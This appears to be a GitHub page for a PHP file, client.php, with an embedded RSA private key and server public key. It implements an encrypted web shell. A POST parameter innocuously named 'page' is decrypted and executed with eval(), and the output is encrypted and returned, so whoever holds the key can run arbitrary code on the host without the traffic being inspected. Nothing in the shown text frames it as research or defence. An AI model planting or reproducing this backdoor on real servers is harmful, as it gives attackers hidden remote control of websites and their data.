-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathclient.php
More file actions
156 lines (138 loc) · 6.12 KB
/
client.php
File metadata and controls
156 lines (138 loc) · 6.12 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
<?php
define('POST_KEY', 'page');
$client_key = '-----BEGIN PRIVATE KEY-----
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
VXZBGZ5xag1vBwr1q6TotGo8z6TkX7g=
-----END PRIVATE KEY-----';
$server_pub = '-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuQpCRFkMWAz6EZrpICc3
+MhOgv/TTnUeHhUWPDqG3eRNnqgxBWOI7wvj+T8d54BpfjLQ/oDIaExPoh5I5rCl
mod8+xm26QNrqXn2UhBiwHX+UkFu4RcgukrtmWZ81kUDJJa6pLE1WuXC91nkY6Pu
BF7W7iF7lwDUXJF9lLZjfhyKpnXWjghxbMXyZjVs4cRlvhYBDbUsD53MNsilZmlv
Dw8KwfD/qdBRI2yBg6c/ivy60k9CgcE+B4vNr3In6DYYwlslUM4NUSc6Bf/gxrjZ
SkpogarHuKrKLyibXX0BcUorTaeOs5N9l++ozPO21uxXGPNiqsVwaNvxKQAKUROq
YE6R/J0YFyhv4aQH7gYcC7Ww4Vh4A3bQz89qNQiKwmy8v35c2e1QdsCvv4E/nEnq
Son3iH0XpXA/n4jYgepDaGPKfA/NNMy1/SI0G6Eu/yLF0dOjdsyxeL9zXNX4t0e7
J3e6HdGpd1LYyInb0zmGMCBR82erbxTZSL5VyYi8J7Dqmf7YlyngZGCi/Ddio+5t
4BV4lKkyHp/gPFXWNfz8c4ByJgZmQXNsYh6jhrvg7uGj00DXX0mPmzYylVpZaeyL
Ctz2AvAcTZo06u7VUVu754GTGArTeNMX29sTuH/sXd532S/3eIQn75jIep8E7lQO
tLU2ruUH6t15puLHgCZBOG8CAwEAAQ==
-----END PUBLIC KEY-----';
if (!isset($_POST[POST_KEY])) {
header('HTTP/1.1 400 Bad Request');
die('Client - Invalid request');
}
$encryptedData = $_POST[POST_KEY];
if (!$priKey = openssl_pkey_get_private($client_key)) {
header('HTTP/1.1 500 Internal Server Error');
die('Client - loading private key failed');
}
if (!$decrypted = ssl_decrypt($encryptedData, $priKey)) {
header('HTTP/1.1 500 Internal Server Error');
die('Client - decrypt failed');
}
$eval_return = eval($decrypted);
if (!$encrypted = ssl_encrypt($eval_return, $server_pub)) {
header('HTTP/1.1 500 Internal Server Error');
die('Client - encrypt failed');
}
echo $encrypted;
function ssl_encrypt($source, $pem)
{
$bits = ssl_getbits($pem);
$encrypted = '';
$cursor = 0;
$blocksize = $bits / 8 - 42;
while ($data = substr($source, $cursor, $blocksize)) {
set_time_limit(10);
error_clear_last();
openssl_public_encrypt($data, $blockdata, $pem, OPENSSL_PKCS1_OAEP_PADDING);
if (!empty(error_get_last())) {
return false;
}
$encrypted .= $blockdata;
$cursor += $blocksize;
}
return base64_encode($encrypted);
}
function ssl_decrypt($source, $pem)
{
$source = base64_decode($source);
$bits = ssl_getbits($pem);
$decrypted = '';
$cursor = 0;
$blocksize = $bits / 8;
while ($data = substr($source, $cursor, $blocksize)) {
set_time_limit(10);
error_clear_last();
openssl_private_decrypt($data, $blockdata, $pem, OPENSSL_PKCS1_OAEP_PADDING);
if (!empty(error_get_last())) {
return false;
}
$decrypted .= $blockdata;
$cursor += $blocksize;
}
return $decrypted;
}
function ssl_getbits($pem)
{
$key = openssl_pkey_get_public($pem);
if (is_resource($key)) {
$keyinfo = (object) openssl_pkey_get_details($key);
return $keyinfo->bits;
}
$key = openssl_pkey_get_private($pem);
if (is_resource($key)) {
$keyinfo = (object) openssl_pkey_get_details($key);
return $keyinfo->bits;
}
return false;
}